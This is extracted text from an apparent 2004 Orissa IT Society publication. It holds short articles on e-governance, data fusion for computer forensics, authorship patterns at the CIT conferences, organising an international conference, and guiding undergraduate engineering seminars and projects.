Above all the government should make aperformance-based index for their humanresources so that in a changed environment thegovernment can measure the performance ofofficersemployees and give them rewardsincentives and promotions on betterperformance Simultaneously the governmentwill also give proper training for a new ITenvironment and new IT solutions for betterservices delivered with KnowledgeManagement Unless and until these criteria arenot used by Government Citizens cant get on-time government services either online or offline

Therefore the government should rethinkand link these management tools in e-governanceenvironment to change the old mindset ofemployees (officials) because technology cantdo everything alone People need transformationin the government as well as the thinking of theperformer who performs the role in the e-Governance initiative Indeed e-Governmentmeans transformation of the government processthrough a series of measurements by applyingnew kinds of methodology and sharing the bestpractices along with knowledge and ideas inthe ICT environment That is the only way torealise our dreams

Raj Kumar Prasad is the Editor of Indian firste-commerce and CEO The Indian Chapter of theCommonwealth Centre for e-Governance and regularspeaker on e-governance and e-commerce worldwide anda thinker for social reform through ICT He is also memberof many world organisations and editorial member of manyInternational journals author can be reached atrajkumarelectronicgovindianet

OITS-2004

16

1 INTRODUCTION

We live in the Information Age and weare consumed by information With the rapiddevelopment of this Digital Information andCommunication Technology (DICT) and theability to conduct business and communicatethrough these revolutionary mediums haspositively impacted upon the social andeconomic well being of the Nation invadingnearly every area of modern life The currentstate-of-the-art of different security systems isrelatively primitive with respect to the recentexplosion in computer communicationscyberspace and electronic commerceOrganizations fully realize that cyberspace is acomplex realm of vital information flows withboth enabling and inhibiting technical factors

APPLICATION OF DATA FUSION IN COMPUTERFORENSICS

Sateesh Pradhan1 amp Suneeta Satpathy2

1 Research Fellow Directorate of Forensic Sciences GEQD Hyd2 Dept of Computer Science and Application Utkal University Bhubaneswar

Since Internet-related legislation is not yetmature and the infrastructure of information andcommunication society is still underconstruction there is always a space for illegalopportunists to commit crime which iscommonly known as Computer Frauds andCyber Crime (CFCC) While information isempowerment the sheer magnitude of theinformation we collect as well as the sensitivityof much of it necessitates that we be cautious inits maintenance storage and protectionIdentifying tracking classifying and assessinghostile and inhibiting activities in this ever-growing complex dimension is an enormous andfascinating technical challenge This is a problemthat has put a major impact in whole worldwideweb in the developed and developing countries

ABSTRACTIn the current age of Digital Information and Communication Technology (DICT) the potential for crushing

availability of data largely without meaning has become a reality Business has become increasingly dependenton the Internet and computing to operate Everywhere the individuals and the organizations are drowning in dataand information and starved for knowledge and understanding This problem has put a major impact worldwidein all the developed and developing countries One of the keys to solve this problem is Data and InformationFusion Data Fusion systems are being proposed for a wide variety of applications around the world by whichmore efficient and cost effective systems can be developed The desire to obtain the maximum benefit fromexpensive sensors and information systems has prompted this interest But the Legal support criminal justicedelivery system and international cooperation have not kept pace with the technological advancements which have takenplace with the advent of information technology Also it has become apparent that there are issues of evidencegathering in a computing environment which by their nature is technical and different to other forms of evidencegathering This paper provides a functional overview of the art and science of multisensor Data Fusion technologyand how it can enhance the performance and reliability of Advanced Security Management Systems and ComputerForensics (CF) and hence extend a further hand to the Law Enforcement and Forensic Investigating Agencies

Keywords Digital Information Technology (DICT) Data Fusion Information Fusion Computer Forensics (CF)Potential Legal Digital Evidence (PLDE)

OITS-2004

17

One of the keys to solve this problem is Dataand Information Fusion The techniques of DataFusion are designed to provide information ofa higher quality than could be obtained by usinga set of sensors independently The no of factorsthat allow the integration of data to be beneficialare

1 Redundancy2 Complementarities3 Timeliness4 Cost of the information

So the Law-Enforcement Agencies has aclear role to protect the informationinfrastructure which is critical to nationalsecurity and protect the public from criminal ormalicious activity occurring through theseelectronic mediums By explaining the nature ofthe vulnerabilities faced by the organizationstoday and discussing the problems this paperoffers an introduction to some of the technicalissues surrounding this new and specializedfield of Data Fusion and its application inComputer Forensics to identify and describesources of evidence to help the Law Enforcementand Forensic Investigating Agencies

2 ELEMENTS AND OBJECTIVES OFCOMPUTER FORENSICS

Computer forensics is the study ofcomputers and networks as they relate to legalprocesses The objective of Computer Forensicsis to learn about computer systems and networksand the information they contain and to do itin such a way that the knowledge can be usedin legal proceedings It is defined as anapplication of computer investigations andanalysis techniques in the interests ofdetermining Potential Legal Digital Evidence

Computer specialists can draw on an arrayof methods for discovering deleted

encrypted or damaged file information(Robbins 1997)

There are four steps in ComputerForensics [3]

1 Identify the evidence2 Preserve the evidence3 Analyze the evidence4 Present the evidence

Objective

1 Recovery Evidence preservation Damage control System restoration

2 Causation (Problem source)3 Proof Evidence Analysis Prove it to prevent future incidents

The tools and processes used in thecollection preservation and analysis ofComputer Forensics evidences are different foreach situation and computer system or network

3 DATA FUSION

Data Fusion is the process of combininginformation from a variety of sensors to producea unified result It can also be defined as a processof combining complementary information frommultiple sensor data to generate a single datathat contains a more accurate description of thescene than any of the individual source dataThe purpose is to merge the data coming fromdifferent information sources and the motivationis to provide information about a scene notobtainable from a single source or to reduce theuncertainty associated with data coming fromsingle source The fusion process ideallygenerates a single composite data that representsall the useful information from a set of data of

OITS-2004

18

different sensors thus removing the problemsinherent in frame-by-frame evaluation andimproves the data interpretation and recognitionby taking advantage of the complementarycharacteristics of different sensors

31 Advantages of Data fusionThe advantages gained through the

synergistic use of multisensory information canbe decomposed into a combination of fourfundamental aspects the redundancycomplementarily timeliness and cost of theinformation which can then be defined as thedegree to which each of these four aspects ispresent in the information provided by thesensors It also provides the following potentials

1Information from multiple viewpoints2 Extended coverage3 Improved accuracy4 Robust and fault-tolerant operation

32 Application and Potential opportunities ofData Fusion in Computer Forensics

Application of Data Fusion in variousfields

Data-fusion technology has been appliedmost prominently to military applications suchas battlefield surveillance and tactical situationassessment Data fusion has also emerged incommercial applications such as roboticsmanufacturing medical diagnosis and remotesensing [11 13 14] In a typical militarycommand and control (C2) system data fusionsensors are used to observe electromagneticradiation acoustic and thermal energy nuclearparticles infrared radiation noise and othersignals [12] In cyberspace security systems thesensors are different because the environmentaldimension is different Instead of a missilelaunch and supersonic transport through theatmosphere cyberspace sensors observeinformation flowing in networks However justas C2 commanders are interested in the originvelocity threat and targets of a warhead thesecurity personnels are interested in the identityrate of attacks threats and targets of maliciousintruders and criminals

Sensor 1

Sensor n

Data

Acquisition

Data

Fusion

Feature Extraction and Interpretation

Identify required

data

PROCESS OF DATA FUSION

The fusion process opens a way to reacha better analysis and understanding of the datafrom the viewpoint of accuracy andor reliabilityby providing enhanced information frommultiple sources [1 7 16] When the sensorsprovide information about the same aspect of aspecific entity the redundancy can be used toincrease accuracy and reliability The inherentparallel nature of using the multiple sensorsmeans that these systems usually operate fasterthan a single sensor could One way of accessingthe performance of such type of fusion systemis to measure the enhancement or thedegradation in the information provided by thesystem

Data + Algorithms + Knowledge = Data Fusion

Fusion Techniques

There are various types of fusion techniques

1 Low level fusion2 Medium level fusion3 High level fusion

OITS-2004

19

In CFThe major goal of Computer Forensics is to

develop and apply the scientific methods infinding the solutions driven by practitionerrequirements and addressing the needsconsidering the current paradigms Profilingidentifying tracing and apprehending cybersuspects are the important issues of researchtoday The ultimate goal is to obtain sufficientevidence in order to trace the crime back to thecriminal Within a computer system theanonymity afforded the criminal encouragesdestructive behavior while making it extremelydifficult for Law Enforcers to prove the identityof the criminal Therefore the ability to obtainthe fingerprint of the users is imperative toacquire some hold on identifying the perpetrator

The studies of available Log files alwaysstand as fundamental in evidence collection Butat a higher level it is necessary to possess a morein depth ability to narrow the field or evenestablish a list of possible suspects So the needof the hour is to develop a concept frameworkto assist Law Enforcement and ForensicInvestigating Agencies to gather the digitalevidences against electronic crimes bydeveloping methodology tools technology andprinciples for analysis and examination leadingto PLDE for expert testimony in the Court of Law

Multisensor Data Fusion provides animportant functional framework for buildingAdvanced Security Management systems andcyberspace security awareness A significantchallenge remains for security systems designersto combine the data and information fromnumerous heterogeneous distributed systemsinto a coherent process that can be used toevaluate the security of the cyberspace

Multisensor data-fusion technology is animportant avenue on the road toward the

development of highly reliable security-decisionsystems that identify track and assesscyberspace situations with multiple complexthreats The output of Fusion-based securitysystems will be the estimates of the identity(location) of a threat source the maliciousactivity taxonomy of the threats the attack ratesand an assessment of the potential severity ofthe projected target(s) This information can beused for gathering the Legal Digital Evidence toprovide timely Justice and punish the criminalby efficiently and timely analyzing the cases4 CONCLUSION

There exist significant opportunities andnumerous technical challenges for thecommercial application of Data Fusion theoryinto the art and science of cyberspace securitysystems The data fusion process is in the veryearly stages of technical development Howeveras networks continue to grow and the expandingrealms of cyberspace evolve there will be anurgent need to drive various securitymanagement systems towards next-generationcapabilities Determining the origin of highlysophisticated damage in cyberspace willcontinue to grow in complexity as attackersbecome more cyberspace astute So the futureSecurity systems tracking coordinatedmultifaceted cyberspace attacks require clusteranalysis techniques adaptive neural networksand rule-based knowledge systems

Multisensor Data fusion is a multifacetedengineering approach requiring the integrationof numerous diverse disciplines such asstatistics artificial intelligence signalprocessing pattern recognition cognitive theorydetection theory and decision theory Integratedsensor and decision support tools are emergingrequirements for robust and reliable AdvancedSecurity management systems in complexinternetworks

OITS-2004

20

5 REFERENCES

[1] wwwdatafusionorg

[2] Approaches to improve automation forsecurity Cyber Information Assurance ampDecision Support (CIADS) InformationSystems Laboratory Applied ResearchLaboratories the University of Texas atAustin

[3] Handbook of Computer Crime InvestigationForensic Tools amp Technology by EoghanCasey (Editor) Academic Press 2002

[4] Internet Engineering Task Force NetworkWorking Group Guidelines for the SecureOperation of the Internet RFC1281Available on line ftpinfocertorgpubietfssphwg

[5] Policies to Enhance Computer and NetworkForensics Proceedings of the 2001 IEEEWorkshop on Information Assurance andSecurity United States Military AcademyWest Point NY 5-6 June 2001

[6] Hochberg et al NADIR An automated systemfor detecting network intrusion andmisuse Computers amp Security 1993Elsevier Science New York 235248

[7] D L Hall and J Llinas An introduction toMultisensor data fusion In Proceedingsof the IEEE vol 85 ndeg 1 pp 6-23 1997

[8] L A Klein Sensor and data fusion conceptsand applications Tutorial texts vol TT14 SPIE Optical Engineering Press USA131 p 1993

[9] Waltz E Information Warfare Principles andOperations 1998 Artech House BostonMA

[10] Hall D Mathematical Techniques inMultisensor Data Fusion 1992 ArtechHouse Boston MA

[11]L F Pau Sensor data fusion Journal ofIntelligent and Robotics Systems vol 1pp 103-116 1988

[12] DSTO (Defence Science and TechnologyOrganization) Data Fusion SpecialInterest Group Data fusion lexiconDepartment of Defence Australia 7 p21 September 1994

[13] Varshney P Distributed Detection and DataFusion 1995 Springer-Verlag NewYork NY

[14] Wald L A European proposal for terms ofreference in data fusion InternationalArchives of Photogrammetry and RemoteSensing Vol XXXII Part 7

[15]Cyber Forensics by Simson Garfinkel

[16] Waltz E and Llinas J Multisensor DataFusion 1990 Artech House Boston MA

OITS-2004

21

The Conferences on InformationTechnology or CITs as they are more popularlyknown have been organised by the OrissaInformation Technology Society every year since1998 It was the first ever internationalconference on IT to be held in Orissa and becamean instant hit The overwhelming success of thisedition conveyed the message that not only hadCIT arrived but it was here to stay Apart fromtheir successes academically these conferencesalso present some interesting patterns regardingthe multiplicity of the authors their regions aswell as the areas of research1 Multiplicity of authors

The papers presented in these conferenceshave had authors ranging between one andseven However it has been found that papershaving two and three authors have dominatedwhile papers having five or more authors havebeen few and far between (Fig1) The onlyexception came in the first edition when papershaving two authors comprised more than three-fifths of the total number of papers (Fig2) Thedetails of the multiplicity of authors have beenpresented in Table 1 which is drawn

Interesting Patterns in CITsA Misra

Silicon School of Information TechnologySilicon Hills Patia Bhubaneswar-751031

aurabindasiliconacin

2 Regions of participations In this section we will consider the

participating regions in terms of countries aswell as institutes With India being the hostcountry she has the maximum representationunderstandably But if we look at the trends inthe participation of other countries we can alsoobserve certain interesting patterns

Firstly the United States has the highestrepresentation from overseas having at least oneauthor in thirty-five papers over the six editionsIt is followed by Japan (11) and Australia(10) inthat order (Table 2) It may be noted with interestthat there were three papers from Brazil in the1999 edition but those are the only papers fromBrazil till date Besides there are about twelvecountries which have only one occurrence whileUSA and Japan have been represented in everyedition

However one discouraging factor has beenthe sharp decline in overseas participants overthe six editions (Fig 3) While in the first edition5405 of the papers had at least one overseasauthor the figure has been hovering around the25 mark in the last four editions In spite ofthis 2003 has recorded the highest number ofpapers having overseas particpation ietwenty-one

On the contrary papers from Orissa havebeen increasing steadily every year which hasbeen shown in Fig 4

As far as Institutes are concerned then theIITs have been the most prominent with theexceptions of IIT Delhi and IIT Roorkee whichhave respectively six and one one contributions

Number of authors per paperYear 1 2 3 4 5 6 71998 6 21 8 1 1 0 01999 8 12 13 8 1 2 02000 5 15 12 1 0 0 12001 3 20 24 5 1 0 02002 4 16 17 4 0 2 02003 9 34 33 4 3 0 0

Table 1

OITS-2004

22

Multiplicity patterns

Fig 11998

Fig 2

age of papers involving overseas au thors yearwise

Fig 3Year

Year

OITS-2004

23

till date Leading the pack are IIT Kharagpurwith thirty-five papers and IIT Guwahati withtwenty-seven Among the other IITs IIT Kanpurhas seventeen while IIT Bombay and IIT Madrashave nine apiece Among the other InstitutesJadavpur University has contributed seventeenpapers while University of Hyderabad hascontributed ten The list of the leading Institutesin terms of number of papers alongwith ayearwise breakdown is given in Table 3

Another interesting trend that can beobserved here is that while the USA leadsoverseas list none of the Institutes figure in thelist while one Institute from Japan figures in thelist It can be concluded that the papers from the

Country 1998 1999 2000 2001 2002 2003 TotalUSA 6 10 3 8 1 7 35

Netherlands 2 0 1 0 0 0 3Japan 2 3 1 3 1 1 11

Australia 3 0 1 1 2 3 10Kuwait 1 0 0 0 0 0 1China 1 0 0 0 0 1 2

Sweden 1 0 0 0 0 0 1UK 1 0 0 0 2 3 6

Portugal 1 0 0 0 0 0 1Italy 1 2 1 1 1 0 6

Canada 1 1 0 0 1 3 6Taiwan 0 1 0 0 0 0 1Brazil 0 3 0 0 0 0 3

Finland 0 1 0 0 0 0 1Mexico 0 1 0 0 0 0 1

Germany 0 1 1 0 0 0 2Malaysia 0 0 1 0 1 1 3

Macao 0 0 0 1 0 0 1Thailand 0 0 0 1 0 0 1Norway 0 0 0 1 1 0 2

Singapore 0 0 0 0 1 0 1Serbia amp

Montenegro 0 0 0 0 0 1 1Tanzania 0 0 0 0 0 1 1

Table 2USA have been scattered across the countrywhile those from Japan have been concentratedin some particular Institutes3 The Topics

As far the topics are concernedNetworking leads the table with a total ofthirtythree papers Among other topics ofprominence are Soft Computing with thirty-onepapers Web-based computing with eighteenand Parallel amp Distributed Computing withsixteen papers Even though there have beenpapers from almost all areas of ComputerScience none of those areas have featuredconsistently in these conferences

OITS-2004

24

Trends in papers having authors from Orissa

Fig 4

Bibliography1 Mahapatra RN ed CIT 98 Trends in

Information Technology Tata McGraw-HillNew Delhi

2 Mohanty H and Baral C ed CIT 99 Trendsin Information Technology Tata McGraw-Hill New Delhi

3 Ghosh RK and Misra D ed CIT 2000Proceedings of Third InternationaConference on Information Technology TataMcGraw-Hill New Delhi

Institute 1998 1999 2000 2001 2002 2003 TotalIIT Kharagpur India 5 0 3 8 5 15 36IIT Guwahati India 1 7 4 6 5 4 27

Jadavpur University India 5 3 0 5 2 2 17IIT Kanpur India 3 1 1 6 2 4 17

University of HyderabadIndia 0 1 0 5 1 3 10

IIT Bombay India 1 3 2 1 1 1 9IIT MadrasIndia 0 0 1 2 3 3 9Iwate PrefecturalUniversity Japan 2 1 1 2 1 1 8

Table 34 Pujari AK and Mohapatra P ed CIT 2001

Proceedings of Fourt InternationalConference on Information Technology TataMcGraw-Hill New Delhi

5 Iyer S and Naik S ed CIT 2002 Proceedingsof Fifth International Conference onInformation Technology Tata McGraw-HillNew Delhi

6 Chakraborty G and Sarkar S ed CIT 2003Proceedings of Sixth InternationalConference on Information Technology TataMcGraw-Hill New Delhi

Year

OITS-2004

25

Conference is an academic activity thatallows researchers from a particular field topresent their findings and take suggestions andcomments from peers Academicians who arenot even presenting papers also attend theconference in order to keep themselves abreastof developments in the particular field and alsoto network with other attendees for possibleresearch collaboration In academic world thereis always the pressure of publish or perishConferences are an outlet to help academiciansto publish

While western world has already masteredthe art of holding conferences developingcountries are slowly gearing up to hosting qualityconferences A quality conference in generalrequires both quality and quantity ofparticipation until and unless the conference isvery narrowly focused Holding a conferencerequires quite a bit of pre-preparation andplanning The conference team needs to managethe logistics of interacting with a large numberof authors reviewers invited speakers potentialsponsors and delegates besides maintaining dayto day communication among all the teammembers This article enumerates the strategiesadopted to enhance both the quantity andquality aspect of an international conference1 inthe area of information technology held inDecember 2003 This conference was successfulin terms of participation management and otheraspects as expressed by various attendees of theconference and also in comparison withprevious conferences held by the same group

Experiences amp Learning from Organising anInternational Conference in a Developing Country

Laxman MohantyPhD Scholar BITS-Pilani

T-10 IIM Campus Vastrapur Ahmedabad-380015

Extending the ReachThe first and foremost challenge for a

conference is to reach to potential authors andthen attract as many delegates as possibleThough the particular conference had been heldconsecutively for last 5 years and had created aname for itself still it remained more or lessconfined to members of the parent associationand their friends It was found that faculty ofmany engineering colleges in India were notaware of the conference but on being told aboutit they showed keen interest to participate in itThus to extend the reach of the conferencefollowing strategies were adopted An e-group was created with the e-mail IDs

found from the proceedings of previousconferences Later this group was extendedusing e-mail IDs received from manypostings received in other e-groups likeBytesforall and IDs received from anotherteam member This e-group was used tobroadcast the call for paper (CFP)announcement 2 to 3 times Request was alsomade to members to forward the call forpaper to all people they knew and whowould be interested in the conference

An address list of engineering colleges ofIndia derived from the approved list ofengineering colleges of All India Council ofTechnical Education (AICTE) was preparedThis list was enriched by the addresses ofIndian Institutes of Technology (IITs)National Institutes of Technology (NITs)Indian Institutes of Information Technology

1 The author was the Organising Chair of theConference

OITS-2004

26

(IIITs) all RampD centers of Council ofScientific amp Industrial Research (CSIR) andother special institutions like Center forDevelopment of Advanced Computing (C-DAC) National Center for SoftwareTechnology (NCST) etc This list was usedto send the CFP poster so that facultyconcerned there could participate in theconference

A specific website was registered and usedto disseminate all information regarding theconference This website was also registeredwith several search engines All theconference documents carried the addressof this website The website also carried allcontact details of the organizing team

The website also carried links to four otherrelated conferences happening about at thesame time in the country and similarly thoseconference websites also provided links tothe website of this conference This crosslinking helped all the conferences to beknown to a large number of potentialparticipants

An address list of magazine and journalsrelated to IT and higher education likeUniversity News and Data Quest wasprepared and a brief write up about theconference was sent to those periodicalsMost of these magazines carried theinformation about the conference Thismethod worked well as judged from severalenquiries received which referred to thenews article in University News

Attracting Large Number of DelegatesThe second task was to attract large

number of delegates A focused effort was madefor achieving this Two separate documents wereprepared Advance Program booklet thatcontained details of the technical session and aposter for special events A symposium on ITamp Education industry session on Sustaining

Indias leadership in IT and student tutorialswere organized as three special events to havelarger public participation in the conferenceBoth the Advance Program booklet and theSpecial Events poster were sent by post to theauthors whose papers were selected and thespeakers who were invited for various talksThere were two fold reasons for this strategy 1)Authors and speakers would know details ofthe program and 2) they would use those twodocuments to invite their colleagues to theconference It was assumed that those authorswould take greater interest in spreading theinformation about the conference as comparedto the communication sent as a generic mail tothe head of the institution

The poster which contained details aboutspecific public events was distributed amongthe teachers of schools and colleges industryprofessionals and policy makers in the citywhere the conference was being held It was doneto enhance local participation in those publicevents

The conference was able to attract 246papers from 11 countries and this was almostdouble of what earlier conferences could attractIn fact this large number of papers increasedthe task of the Program Chairs beyondexpectation and they had to recruit morereviewers This also doubled the task ofinforming authors about the status of theirpapers acceptancerejection and finallydirection for final submissionCoordination Among the Organizing Team

The conference team consisted ofprofessionals working in various institutionsspread over different countries like India Japanand USA In India the members were fromdifferent cities Owing to team members beinglocated physically in different places physicalmeeting and planning were eliminatedCyberspace was extensively used to plan and

OITS-2004

27

decide various issues regarding the conferenceThree specific e-groups were created for variousrequirements Egroup1 This e-group contained the e-mail

IDs of the chairs of the conference It wasused to appraise other members regardingwho is doing what Also suggestions weresought for various issues such as publishersto be approached for proceedings who wereto be invited for keynote and special talksand which places to be included in the sightseeing tour etc

Egroup2 This e-group was a super set ofegroup1 and contained e-mail IDs of chairsof the present conference and the pastconferences It was assumed that this groupby being involved in 6 editions of thisconference (including the current one) helda large knowledgebase that can be used tosort out various policy issues regarding theconference For example issues likeregistration fee what type of tutorials andwhat facilities to be extended to variousinvited speakers were discussed anddecided upon through this e-group

Egroup3 This e-group comprised of themembers of the parent association of theconference This e-group was used to keepthe group members informed about thedevelopments of the conference and alsogalvanize support for participation andpublicity

Several members of the parent associationobserved during the conference that though theywere not actively contributing to any discussionin the e-group yet they were happy to get allstatus reports about the conference and be partof the discussions among the members

Besides these groups a large number of one-to-one and one-to-many e-mail exchanges weremade to facilitate information sharing anddecision making

It may be noted that the organizing team ofthe conference acted more like a virtual team withmembers physically located at various placesin the world Interestingly many members didnot know other members personally Thus it wasdecided that in the website the name of eachconference chair will be linked to hisherpersonal web pages so that other members canlook at those pages and become familiar withthe persons they are workingReviewing the Papers

Receiving papers reviewing theminforming the authors about the acceptancerejection of their papers and finally receivingthe camera ready papers are some of the criticalfunctions that needed to be done with great careCyberspace was extensively used to carry outthese activities thus making execution of tasksfaster accurate and inexpensive Though therewas no facility for online submission authorscould e-mail their papers to either of the ProgramChairs Each paper was to be reviewed by atleast two reviewers Private HTML pages werecreated to facilitate this review process TheseHTML pages carried the following informationabout the papers submitted - numbers titleswhether reviewers found or not for a given paperand if found whether two reviewers were foundReviewers were given the access to those pagesand were asked to select the papers which wereyet to be allotted for review and the ones theywould like to review They could then downloadthe concerned papers for review E-mails wereused to receive reviews from the reviewers andcommunicate the same to authors withselection rejection status of their papers Finalpapers were also received through e-mails fromthe authorsDelegation

Though the committee of chairs wasresponsible for all basic activities yet it was notpossible for this committee to handle allresponsibilities especially those related to local

OITS-2004

28

arrangements Thus a committee of coordinatorsfor various activities was formed to handlevarious sub functions For example acoordinator was especially designated to lookafter accommodation and local conveyance ofguest speakers and delegates The conferencewas providing accommodation to around 20 oddguest speakers and they were to reach the venueat different dates and times and from differentcountries Receiving them putting them up inhotels and enabling them to reach the conferencevenue were all complex tasks and needed fulltime attention of one person

Besides accommodation and localconveyance there were coordinators forregistration arrangement at the conferencevenue poster session and special programs etcThe details of this coordination team were putup on the website and delegates were informedthrough e-mails to get in touch with the relevantcoordinator for their queries and requirementsThe coordinators were the faculty members ofthe host college and each coordinator wasassisted by a team of student volunteers fromthe same college

This arrangement not only ensured smoothfunctioning of the conference it increasedinvolvement of a large number of facultymembers The coordinators also appreciated therecognition they received For student volunteersit was a great learning opportunityExtending the Scope of the Conference

By nature a conference is an academicfunction and only involves researchers andacademicians from different institutions But thisconference was designed also to accommodatestudents industry representatives and teachersfrom schools and colleges Three special eventswere organized for this target group asymposium for educators an industry sessionfor students researchers and teachers andtutorials specially designed for students Allthese sessions were very successful and attracted

a large number of participants from the city Thusthe conference could benefit the community inthe local contextThe Financing Model

The conference also had a unique financingmodel Its registration fee was kept sufficientlylow to attract large number of participants Thusthe registration fees alone were not sufficient tomeet all the expenses Though the conference isorganized by an association in reality a localengineering college takes the lead every year inhosting it while other colleges provide financialsupport So a large part of the financialrequirement was met by the contribution fromthe local engineering colleges In return thesecolleges were given free registration for certainnumber of participants in the conference andthe tutorials

Tutorials were designed in such a way(content duration course materials and otherfacilities wise) that participants would not mindpaying to attend them Independentsponsorships were sought from local collegesfor special events and this was acknowledgedduring the event Besides association membersstaying abroad were able to garner a large chunkof financial support from some corporates Govtorganization like CSIR also extended somesupport The conference was able to generate asmall surplus besides meeting all its needs Thissurplus is given to the parent association to carryout computer awareness activitiesConclusion

The whole experience of being part of theorganizing team that carried out planningdesigning and organizing of the conferenceshowed that by bringing in innovation todifferent dimensions of the conference a teamcan not only enhance both the quality andquantity of participation among variousstakeholders it can turn the whole experienceinto an enriching and fun filled experience

OITS-2004

29

Guiding Seminars and Projects for UndergraduateEngineering Students

MN DasProfessor amp HOD

Computer Science amp Engineering and IT

IntroductionConduct seminar presentation and projects

for undergraduate engineering students in theirfinal year is an important and statutory part ofany university curriculum Seminar measuresmostly the external abilities and projectmeasures the internal abilities of a studentThrough seminar besides the technicalknowledge the presentation communicationand interpersonal skills of a student also getreflected Through project the depth of technicalknowledge acquired amp degree of understandingon fundamentals of engineering subjects by thestudent get evaluated Also to some extent thepresentation skills of a student gets reflect whenhe or she submits the project report and presentsbefore the audience (examiners studentcolleagues etc) A student goes through varietiesof engineering subjects (both theory andsessional) during his or her engineering studtyThese papers are mainly divided into twocategories (i) Core papers amp (ii) Supportingpapers Seminars and projects are based on thethorough understanding of all these papers bythe students Besides these course curriculumknowledge the projects amp seminars are alsobased on the extra or additional knowledgeacquired by the students by going throughvarious journals magazines research papersCDs internet amp reference books etc and byattending several tutorials workshopsseminars conferences symposiums andtechnical competitions etc

In short seminar and project are one typeof indicators of a students mental capability and

orientation to face and accept the practical andtechnical challenges in the real scenarios infuture

Role of faculty members as guides aco-guides

A student needs active support from his orher guide or co-guide for preparing himself orherself to present seminar and carrying out aproject work successfully Normally this guideis one of the faculty members of the concerneddepartment But some cases when a studentcarries out a project work in an organizationother than his or her institute a member of thatorganization becomes the guide However inthat case one of the faculty members of thedepartment must become a co-guide The role orthe co-guide is very important in the sense thathe or she has to orient the project done by thestudents as per the University guidelines Aseminar can be presented individually or ingroup (normally no of group members shouldnot exceed 3) Each Seminar team (either onemember or multiple members) must be linkedwith a guide called seminar guide Similarly aproject can be done individually or in group(normally no of group members should notexceed 5) Each project team (either one memberor multiple members) must be linked with a guideor co-guide called project guide or project co-guide Selecting a guide by a student group orvice versa is normally done through mutualconsultation Head of the department can playthe role of a negotiator in this situation For abetter focus and attention no of project teamsunder the supervision of a project guide or co-

OITS-2004

30

guide should not exceed 2 and no of seminarteams under the supervision of a seminar guideshould not exceed 4 Each group (either projector seminar) must submit an abstract or synopsisof the work to be done or presentation to be madeto their respective guides sufficiently before thecommencement of project work or seminarpresentation Seminar guides must ensure thattopics of seminars are of advanced amp state-of-the-art type These topics should not be from theUniversity course curriculum but can be basedon the basics of these subjects A schedule forthe seminar presentations should be notified byHOD to all concerned in a tabular manner withthe following fields representing the columns

rapport with them by directly speaking andby using proper eye contact A keennessshould be shown to them that thispresentation is for their learning amp benefitonly

b) The Middle bit is usually longest and canhave several sections This is structured witha logical sequence Movement from one areaor topic to another is done using verbal orvisual links OHP or LCD acetates are usefulfor breaking the middle bit up into smallerchunks

c) The End of the presentation should be asummary a conclusion a logical end to whathas gone before

iii) PracticeA number of practices should be made

about the presentation in front of the mirror infront of the cat before friends amp on ones ownetc If possible the audio visual equipments likeOHP LCD etc can be tried out before the actualday of presentations During practice feed backcan be obtained from friends regarding thespeaking speed (ie whether too fast or too slow)the visual aids (whether clear or not) logicalmovement of sequence (whether correct or not)amp overall performance (whether excellent goodor poor etc)

Following hints amp tips may be followedduring practice or at the time of actualpresentation Breathe slowly it calms you down Speak audibly but dont shout Speak at normal pare not very fast not

very slow Speak clearly Be enthusiastic Avoid using jargons and colloquialisms

unless these are familiar to the audience Be aware of your gestures

Date Time Slot Group Title of Formatof topic presentation

(LCD OHP)

Guidelines for Seminar Presentation3 PS Preparation Planning amp practicei) PreparationPreparation for seminar presentation can

be effectively done if the following questions areasked to themselves by the students concerned What do I want the audience to LEARN or

DO as a result of my presentation How can I keep the audience interested Do I know my subject

Fundamental rule is that keep itstraightforwardly simple which is abbreviatedas KISS

ii) Planning-Any form of communication should have

a structure Beginning a Middle bit and anEnda) The Beginning should tell the audience

what the presenter(s) is going to tell them Itshould be positive Presenter should engagethe audiences attention and establish

OITS-2004

31

Use large fonts if LCD or OHP are beingused

Learn from watching others follow thestrength amp reject the weaknesses of otherspeakers

Use lots of figures diagrams charts ampgraphs etc

Point to the projection (screen) not thesource

Maintain the timing perfectly

Guidelines for Project Presentation(We have assumed that project guides

project teams amp topics of the projects havealready been finalized)1st Step- Write the abstracts or synopsis of theproject2nd Step- Set a realistic timeframe

Assuming 100 effectives working days ina semester the following is a sample break upDefine your problem - - - - - - - -Write a proposal - - - - - - - -- - -Develop your solution - - - - - - -Implement your solution - - - - -Present your solution - - - - - - -Submit the project report - - - - -3rd Step-

Make proper evaluation amp assessment ofperformance of the students on the basis of finalproducts (results reports and presentation) andthe process by which they were attained Thegrade is given for the entirety of the project Asample grade system may be as followsA a consistently excellent effort that attains

project goalsB a consistently good effort that attains project

goalsC an acceptable effort that at least partially

attains the project goals

D an inconsistent or unsatisfactory effort thatonly partially attains project goals

F an unsatisfactory effort that does not attainproject goals

Tips for writing project reports 1) Sketch the outline of the project2) Expand your outline3) Write your paper4) Rewrite until you get it right

A sample outline for project reports Introduction Background Design Implementation System in Action Results Future work Conclusion ReferenceBesides these the cover page design

acknowledgement topic index index for figuresamp tales etc can be added at proper locations ofthe project report

ConclusionSince projects amp seminars are indicators of

internal amp external abilities of the engineeringstudents the respective faculty guides or co-guides must motivate their students in such amanner that they do not resort to any kind offalse means for carrying out these two mostimportant activities of their student carrer

20 days

20 days

60 days

About the author Prof MN Das is currently Professoramp HOD in the Department of Computer Science ampEngineering at KIIT Deemed University After completinghis BE in Electronics amp Telecommunication branch in1987 from UCE Burla he was with ECIL Hyderabadfor few months in its computer group Then he joinedas a lecturer in the Dept of Electronic amp Tele commengineering dept of UCE Burla and continued upto1987 He completed his ME in Electronics systems ampcommunication during this period He then joined OrissaState Electronic Development Corporation (OSEDC) Ltdfor 1987 amp continued upto 2002 During that period hecompleted his PG Diploma in Management atXIMBAfter a long 16yrs inducted experience in various areashe joined KIIT Deemed University from 2002 onwards

OITS-2004

32

Information and CommunicationTechnology (ICT) has today become an integralpart of governance especially in India ICT isviewed as a tool that will help deliver servicesboth in the public and the private sector to theubiquitous common man What used to takeyears to compile and analyse now takes just afew seconds or minutes

E-governance as a concept involvesleveraging ICT to streamline the administrativeprocess it involves computerisation of recordsfacilitating efficient transactions betweenvarious government departments networkingoffices and using websites and e-mail to bringadministrators closer to people

In the past decade e-governance has beena popular buzzword among politicians andbureaucrats alike especially in India One quasi-Government organisation in Tamil Nadu hasdecided to go the distance by implementing e-governance at a micro level their office is nowcompletely paperless and file-transfer takesplace in an electronic format

